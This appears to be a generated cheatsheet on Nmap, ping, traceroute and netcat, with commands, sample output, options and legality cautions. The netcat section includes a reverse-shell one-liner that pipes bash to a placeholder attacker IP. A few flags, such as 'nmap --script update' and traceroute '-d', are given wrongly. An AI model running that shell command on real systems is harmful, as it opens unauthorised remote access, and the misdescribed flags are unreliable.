Nmap And Network Scanning

Category: Network Tools and Commands
Type: Network Tools & Commands
Generated on: 2025-07-10 09:15:17
For: Network Engineering, Administration & Technical Interviews

---

This cheatsheet provides a comprehensive guide to using Nmap and other network scanning tools, aimed at network administrators and engineers.

1. Tool Overview

• Nmap: A powerful and versatile network scanner used for host discovery, port scanning, service enumeration, and OS detection. Essential for network mapping, security auditing, and vulnerability assessment.
• Ping (ICMP Echo Request): A fundamental tool for verifying network connectivity and basic host reachability. Useful for preliminary network troubleshooting.
• Traceroute/Tracert: Determines the path packets take to reach a destination, identifying intermediary routers and measuring latency. Helps diagnose network routing issues.
• Netcat (nc): A versatile networking utility for reading from and writing to network connections using TCP or UDP. Useful for port scanning, data transfer, and simple server/client testing.

When to Use:

• Nmap: Comprehensive network discovery, port scanning, service version detection, OS fingerprinting, vulnerability assessment, firewall testing.
• Ping: Quick host reachability check, basic network connectivity verification.
• Traceroute/Tracert: Identifying network hops, diagnosing routing problems, measuring latency along a path.
• Netcat: Testing network connectivity, transferring data between hosts, simple server/client communication testing, port scanning.

2. Basic Syntax

Nmap:

nmap [Scan Type(s)] [Options] {target specification}

Ping:

ping [Options] {target}

Traceroute (Linux/macOS):

traceroute [Options] {target}

Tracert (Windows):

tracert [Options] {target}

Netcat:

nc [Options] {target} {port}

3. Practical Examples

Nmap:

• Ping Scan (Host Discovery):

nmap -sn 192.168.1.0/24

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:00 PST
Nmap scan report for 192.168.1.1 (router.local)
Host is up (0.0010s latency).
Nmap scan report for 192.168.1.10 (printer.local)
Host is up (0.0020s latency).
Nmap scan report for 192.168.1.20 (desktop.local)
Host is up (0.0015s latency).
...
Nmap done: 256 IP addresses (10 hosts up) scanned in 5.00 seconds

• TCP Connect Scan (Full TCP Handshake):

nmap -sT 192.168.1.20

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:01 PST
Nmap scan report for 192.168.1.20
Host is up (0.0015s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

• SYN Scan (Stealth Scan):

nmap -sS 192.168.1.20

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:02 PST
Nmap scan report for 192.168.1.20
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

• UDP Scan:

nmap -sU 192.168.1.20

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:03 PST
Nmap scan report for 192.168.1.20
Host is up (0.0018s latency).
Not shown: 996 closed udp ports (port-unreach)
PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
123/udp   open          ntp
631/udp   open|filtered ipp

Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds

• Service Version Detection:

nmap -sV 192.168.1.20

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:04 PST
Nmap scan report for 192.168.1.20
Host is up (0.0016s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds

• OS Detection:

nmap -O 192.168.1.20

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:05 PST
Nmap scan report for 192.168.1.20
Host is up (0.0014s latency).
Device type: General purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4
OS details: Linux 4.15 - 5.13

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

Ping:

• Basic Ping:

ping 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.500 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.450 ms
...
^C
--- 192.168.1.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 0.450/0.475/0.500/0.025 ms

Traceroute/Tracert:

• Basic Traceroute:

traceroute google.com

traceroute to google.com (142.250.184.142), 30 hops max, 60 byte packets
 1  192.168.1.1 (192.168.1.1)  1.200 ms  1.000 ms  0.800 ms
 2  10.0.0.1 (10.0.0.1)  5.000 ms  4.800 ms  5.200 ms
 3  ...
...

tracert google.com

Tracing route to google.com [142.250.184.142]
over a maximum of 30 hops:

  1    <1 ms   <1 ms   <1 ms  192.168.1.1
  2     5 ms     4 ms     5 ms  10.0.0.1
  3   ...
...

Netcat:

• Port Scanning (TCP):

nc -v -z 192.168.1.20 20-25

Connection to 192.168.1.20 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.20 25 port [tcp/smtp] succeeded!

• Listening on a Port (Simple Server):

nc -l -p 12345

• Connecting to a Port (Simple Client):

nc 192.168.1.20 12345

4. Common Options

Nmap:

• -sn: Ping scan - disable port scan
• -sT: TCP Connect scan
• -sS: SYN scan (Stealth scan) - requires root privileges
• -sU: UDP scan
• -sV: Service version detection
• -O: OS detection - requires root privileges
• -p: Specify port(s) to scan (e.g., -p 22,80,443, -p 1-1000)
• -F: Fast scan (scan fewer ports)
• -A: Aggressive scan (enable OS detection, version detection, script scanning, and traceroute)
• -T<0-5>: Timing template (0=paranoid, 1=sneaky, 2=polite, 3=normal, 4=aggressive, 5=insane) - affects scan speed. Higher numbers are faster.
• -iL <inputfilename>: Scan targets from a file.
• -oN <outputfilename>: Output to normal text file.
• -oG <outputfilename>: Output to grepable text file.
• -oX <outputfilename>: Output to XML file.
• --script <script_name>: Use Nmap Scripting Engine (NSE) scripts for advanced scanning. Examples: --script banner, --script vuln
• --traceroute: Perform traceroute after host discovery.

Ping:

• -c <count>: Number of ping packets to send. (Linux/macOS)
• -n <count>: Number of ping packets to send. (Windows)
• -t: Ping continuously until stopped. (Windows)
• -i <interval>: Interval between pings in seconds. (Linux/macOS)
• -w <timeout>: Timeout in seconds before exiting, regardless of how many packets have been sent or received. (Linux/macOS)
• -l <size>: Packet size (Windows)

Traceroute/Tracert:

• -m <max_hops>: Maximum number of hops to search. (Linux/macOS)
• -h <max_hops>: Maximum number of hops to search. (Windows)
• -w <timeout>: Timeout in seconds to wait for a response. (Linux/macOS)
• -d: Bypass normal routing and send directly to host. (Linux/macOS)

Netcat:

• -l: Listen for incoming connections.
• -p <port>: Specify the port to listen on or connect to.
• -v: Verbose output.
• -z: Zero-I/O mode (used for port scanning).
• -u: Use UDP instead of TCP.
• -n: Do not resolve hostnames.
• -w <seconds>: Timeout for connections.

5. Advanced Usage

Nmap:

• Scanning a list of hosts from a file:

nmap -iL hosts.txt -sV -oN scan_results.txt

• Scanning for specific vulnerabilities using NSE scripts:

nmap --script vuln 192.168.1.20

• Combining OS detection and service version detection:

nmap -O -sV 192.168.1.20

• Firewall testing (using different scan types to bypass firewall rules):

nmap -sS -p 80 192.168.1.20  # SYN scan
nmap -sT -p 80 192.168.1.20  # TCP Connect scan
nmap -sN -p 80 192.168.1.20  # Null scan
nmap -sF -p 80 192.168.1.20  # FIN scan
nmap -sX -p 80 192.168.1.20  # Xmas scan

• Scanning with custom timing options (adjust for network conditions):

nmap -T4 --min-rtt-timeout 100ms --max-rtt-timeout 500ms --initial-rtt-timeout 250ms 192.168.1.0/24

• Using Nmap to identify Heartbleed vulnerability:

nmap -p 443 --script ssl-heartbleed 192.168.1.20

Netcat:

• Creating a reverse shell (attacker listens on a port):

  • Target (Linux): nc -l -p 12345 | /bin/bash | nc <attacker_ip> 4444
  • Attacker: nc -l -p 4444

• File transfer:

  • Sender: nc -l -p 12345 < file.txt
  • Receiver: nc <sender_ip> 12345 > received.txt

6. Troubleshooting Scenarios

• Host unreachable (Ping fails):
  • Problem: Host may be down, network connectivity issues, firewall blocking ICMP.
  • Solution: Verify physical connection, check IP address, examine routing tables, investigate firewall rules. Try pinging the gateway to see if the local network is the issue.
• Port scan shows all ports filtered:
  • Problem: Firewall is blocking all ports, host is down, Nmap is not running with sufficient privileges (for SYN scan).
  • Solution: Verify host is up, check firewall rules, run Nmap with root privileges (if using SYN scan). Try a TCP Connect scan (-sT) as it doesn’t require root.
• Traceroute shows asterisks (*) for hops:
  • Problem: Router not responding to traceroute requests, firewall blocking ICMP Time Exceeded messages.
  • Solution: This is often normal, especially on the public internet. Try using TCP traceroute (traceroute -T) on Linux. On Windows, there isn’t a built-in TCP traceroute; you can use tools like tcptraceroute.
• Service version detection is inaccurate:
  • Problem: Service version is intentionally obfuscated, Nmap’s database is outdated, service is running on a non-standard port.
  • Solution: Update Nmap’s service database (nmap --script update), manually investigate the service, try running service detection on all ports.
• Slow scan speeds:
  • Problem: Network latency, aggressive firewall rules, Nmap timing options set too conservatively.
  • Solution: Adjust Nmap timing options (-T3 or higher), increase RTT timeouts, reduce the number of ports scanned.

7. Output Interpretation

Nmap:

• Host is up/down: Indicates whether the host is reachable.
• Open: The port is listening for connections.
• Closed: The port is accessible, but no application is listening.
• Filtered: Nmap cannot determine if the port is open or closed due to firewall interference.
• Unfiltered: The port is accessible, but Nmap cannot determine its state.
• Open|Filtered: Nmap believes the port is open or filtered, but cannot determine definitively.
• Closed|Filtered: Nmap believes the port is closed or filtered, but cannot determine definitively.
• Service Version: The version of the application running on the port (e.g., “OpenSSH 8.2p1 Ubuntu 4ubuntu0.7”).
• OS Details: The detected operating system of the target host.

Ping:

• Time: Round-trip time (RTT) in milliseconds. Lower is better.
• TTL: Time To Live. Decrements with each hop. Can indicate OS type (higher TTL values often suggest Linux/Unix).
• Packet Loss: Percentage of packets lost during the ping test.

Traceroute/Tracert:

• Hop Number: The sequence number of each router along the path.
• Hostname/IP Address: The hostname (if resolvable) and IP address of each router.
• Latency: The round-trip time (RTT) to each router.
• *: Indicates a timeout or that the router did not respond to the traceroute request.

Netcat:

• Output depends on the specific usage. For port scanning, “Connection to…succeeded!” indicates an open port.

8. Security Considerations

• Legality: Scanning networks without permission is illegal in many jurisdictions. Always obtain explicit permission before scanning any network you do not own or administer.
• Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): Aggressive scanning can trigger alerts and potentially be blocked by security systems.
• Resource Consumption: Scanning large networks can consume significant bandwidth and processing power, potentially impacting network performance.
• Stealth: Use stealth scan techniques (e.g., SYN scan, fragmented packets) to minimize the risk of detection, but be aware that these techniques may still be logged.
• Denial-of-Service (DoS): Avoid sending excessive traffic or using techniques that could overwhelm the target system.
• Data Privacy: Be mindful of sensitive information that may be exposed during scanning (e.g., usernames, passwords).
• Nmap Scripting Engine (NSE): Exercise caution when using NSE scripts, as some scripts may be outdated, malicious, or produce unintended consequences. Review the script’s source code before execution.

9. Platform Differences

• Root Privileges: SYN scan (-sS) and OS detection (-O) typically require root privileges on Linux/macOS. On Windows, Nmap may require administrative privileges.
• Command Syntax: Some command options may vary slightly between Linux/macOS and Windows (e.g., ping options).
• Path to Executables: The location of Nmap, ping, traceroute, and netcat executables may differ depending on the operating system and installation method.
• Firewall Configuration: Firewall rules and configurations vary significantly between operating systems. Adjust firewall settings as needed to allow or block scanning traffic.
• Netcat Availability: Netcat is not always installed by default on all operating systems. Install it using your distribution’s package manager (e.g., apt install netcat on Debian/Ubuntu, brew install netcat on macOS with Homebrew, or download it for Windows). ncat (part of the Nmap suite) is a more modern and feature-rich alternative.

This cheatsheet is a starting point. Refer to the official documentation for each tool for complete details and advanced options. Always prioritize ethical and legal considerations when performing network scanning activities.